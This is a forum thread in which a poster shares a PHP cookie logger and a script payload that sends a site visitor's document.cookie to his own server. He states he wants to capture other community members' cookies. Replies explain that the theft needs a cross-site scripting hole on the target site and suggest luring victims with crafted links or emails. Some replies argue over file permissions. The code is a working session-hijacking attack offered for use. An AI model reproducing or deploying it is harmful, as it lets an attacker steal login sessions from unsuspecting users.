Masquerade Posted December 5, 2008 Posted December 5, 2008 Hey everyone. Im trying to set up a community cookie logger. Ive created a cookielogger.php containing $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } } echo "Temporary Server Error,Sorry for the inconvenience."; fclose($handle); exit; } echo "Temporary Server Error,Sorry for the inconvenience."; exit; ?> Then, an emtpy logfile.txt And a file called meal.gif containing <script>location.href='http://masque.myhost.net/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT> The files look like the following: /htdocs/cookielogger.php /htdocs/logfile.txt /htdocs/meal.gif Read and Write permissions on logfile.txt are enabled (7777). But somehow, the file is after a visit of a community member still empty. Could someone help me with that? Thanks! Benny Quote
digip Posted December 6, 2008 Posted December 6, 2008 Unless you cna find a cross site scripting flaw in the site your trying to steal cookies from, or in the users browser itself, you are not going to be able to download all their cookies by simply having them view your site. The only cookie you would be able to get this way is one set by your own site. Now, if you could insert some code that ran on someone elses site and wrote the cookies back to your servers, then you might have the chance to steal something, but only if they fall victim to xss vulnerabilities. Iframes won't work either, since the iframe would be cookies from your site, not the target site. Javascript is your best bet, or if you could post back to your php file on your site with a form or javascript link embedded on their site. Quote
Ingo Posted December 6, 2008 Posted December 6, 2008 Other than what Digip pointed out, You have typo: { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { Atleast I think that there should not be three (3) "=" marks, two (2) should mean equal. and shouldn't you specify name of the cookie you are trying to get? Sorry if my post is complete bs. Quote
digip Posted December 6, 2008 Posted December 6, 2008 Other than what Digip pointed out, You have typo: Atleast I think that there should not be three (3) "=" marks, two (2) should mean equal. and shouldn't you specify name of the cookie you are trying to get? Sorry if my post is complete bs. You can get the cookie with javascript simply by typing into your toolbar the following java script:alert(document.cookie); Just take out the spaces the forums put in the code. If you were stealing cookies, you can use something similar to contruct a URL people can click on and make it post back the cookie to some cgi or php script on your own server. If they were dumb enough, you could make an email url and have them send it to you directly. Its whether or not the target site you want the cookies from is vulnerable to xss though, and if they allow you to post javascript or other code into their pages. Quote
aeturnus Posted December 9, 2008 Posted December 9, 2008 Read and Write permissions on logfile.txt are enabled (7777). You set a file facing the Internet to 7777 with that code you provided? That's awesome, can I go ahead and get your IP address? Thanks :) Quote
PLuNK Posted December 9, 2008 Posted December 9, 2008 The file permissions should be 0777 not 7777 And your not going to really be able to modify the files being presented on the HTTPd, Unless you find a exploit. Quote
aeturnus Posted December 9, 2008 Posted December 9, 2008 The file permissions should be 0777 not 7777 And your not going to really be able to modify the files being presented on the HTTPd, Unless you find a exploit. I hope you weren't responding to me since your post is completely incorrect. Quote
PLuNK Posted December 9, 2008 Posted December 9, 2008 Yes I was responding to you, Please explain? Quote
aeturnus Posted December 9, 2008 Posted December 9, 2008 The file permissions should be 0777 not 7777 And your not going to really be able to modify the files being presented on the HTTPd, Unless you find a exploit. Well, there's a lot wrong here. Without going into too many details or wanting to argue, let's just take your statements and debunk them. Given the code: Ive created a cookielogger.php containing $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { ... } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { ... } } ... ?> You simply give him a page with a correct cookie value and its written to the file. That file is served by httpd. So "And your not going to really be able to modify the files being presented on the HTTPd" is an incorrect statement. Let's look at your first statement about the file permissions. Why do you need the setuid, sticky, setgid, and execute permissions set? It's a security risk. So that statement is wrong as well. Yes, I think I see what you meant to say about the exploitation. But you didn't, and your statements are therefore incorrect like I said. The details about how I would gain entry to such a system are beyond the scope of this argument. If you ask me really nicely I might try to help you out if you set up such a box for me to gain entry to. Really though, if you can't see any problems with the presented vulnerabilities then you should pick up a book on security. Start simple, go with the Hacking Exposed books. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.